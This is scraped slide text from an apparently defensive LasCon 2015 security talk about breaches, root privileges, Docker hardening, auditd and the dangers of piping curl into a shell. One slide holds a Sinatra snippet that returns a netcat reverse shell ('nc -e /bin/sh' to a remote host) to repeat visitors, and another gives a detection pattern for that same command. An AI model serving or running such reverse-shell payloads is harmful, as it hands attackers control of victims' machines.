Recovered operations monkey at Puppet Labs. ▸ Own a lot of black t-shirts. ▸ Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 3 — @benjammingh for LasCon 2015
why am I here. ▸ Things from the real world(™) & how to cope. ▸ Far far too many summaries. ▸ Wings, moonshine and dancing? (I have no idea) 4 — @benjammingh for LasCon 2015
tiny bugs in Chrome to full sandbox escape. ▸ Egor Homakov's 5 small bugs in Github to full private access on GitHub. ▸ XSS to remote code execution in under an hour. ▸ Username & password from HVAC system leads to 8 — @benjammingh for LasCon 2015
Wireshark: 322! CVEs ▸ Security Firm Bit9 Hacked, Used to Spread Malware ▸ Joxean Koret on Breaking Antivurius software ▸ Tavis from Project Zero on exploiting ESET ▸ BEST! FireEye just running Apache/PHP as root ! 11 — @benjammingh for LasCon 2015
great position for security people, who don't want to get paid. ▸ Everyone? Do I have some emails with funny cats for you to click on. ▸ Security vendors? If you have infinite money and no attackers. ▸ Attackers! 12 — @benjammingh for LasCon 2015
▸ Other: github/gdestuynder/Audisp-json ▸ Have cash, want a decent GUI (and more): Go use Threatstack! ▸ Write something yourself in python & golang: I keep promising to OSS this ): 34 — @benjammingh for LasCon 2015
2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. 35 — @benjammingh for LasCon 2015
if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end 40 — @benjammingh for LasCon 2015
cost ~$6. ▸ If I can't make $6 by owning a system, I should probably stop being an attacker. ▸ @letsencrypt will soon make this free. 47 — @benjammingh for LasCon 2015
root. ▸ No really, stop running things as root. ▸ Did I mention not running things as root. ▸ It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) 63 — @benjammingh for LasCon 2015
all and --cap-drop <thing> to get the minimum capabilities. ▸ Use Docker Notary ▸ Use GRSecurity (just do that anyway, if you can.) ▸ Use SELinux... I may as well ask for a pony here. 64 — @benjammingh for LasCon 2015
Docker is ZOMG unhackable. ▸ it's just cgroups and namespacing. (just) ▸ Escapes will happen. ▸ They have a rad security team (Hi @diogomonica and @nathanmccauley) 70 — @benjammingh for LasCon 2015
is secure, enough. ▸ network separation & segregation still works. ▸ secrets/credentials still a bigger problem. ▸ PLEASE don't just adopt it because it's new & shiny. ▸ ! " unikernels ✨ $ 71 — @benjammingh for LasCon 2015
security problems. (see Oauth) ▸ Annual pen-tests don't scale, bug bounties can help. ▸ Attackers are mining any public info you have (GitHub, S3, pastebin?) ▸ No really, go check all your S3 buckets... 85 — @benjammingh for LasCon 2015
you to stop trusting curl. ▸ Auditd is awful, but it can be fewer awful. ▸ Jenkins, you probably have to have one. ▸ but that can be okay, nay, even useful for security. 86 — @benjammingh for LasCon 2015
Docker and security can be used in the same sentence. ▸ Understand your threat model (Apple's guide) ▸ Don't be a FireEye, stop running things as root. 87 — @benjammingh for LasCon 2015
barnbarn
quramy
keavy
thoeni
lynnandtonic
nonsquared
jcasabona
jonrohan
danielanewman
sergeychernyshev
jlugia
wjessup
destraynor
![SINATRA EXAMPLE get '/install.sh' do if request.env['HTTP_USER_AGENT'] =~ /curl/ return](https://files.speakerdeck.com/presentations/acba6cdda02143bab7d5c0bced3519ea/slide_38.jpg){kind=link}
![SINATRA EXAMPLE 2: PAYBACK get '/install.sh' do ip = request.env['HTTP_CLIENT_IP']](https://files.speakerdeck.com/presentations/acba6cdda02143bab7d5c0bced3519ea/slide_39.jpg){kind=link}
![JENKINS AS A FORCE FOR [SECURITY] GOOD ▸ Gauntlt "be](https://files.speakerdeck.com/presentations/acba6cdda02143bab7d5c0bced3519ea/slide_80.jpg){kind=link}
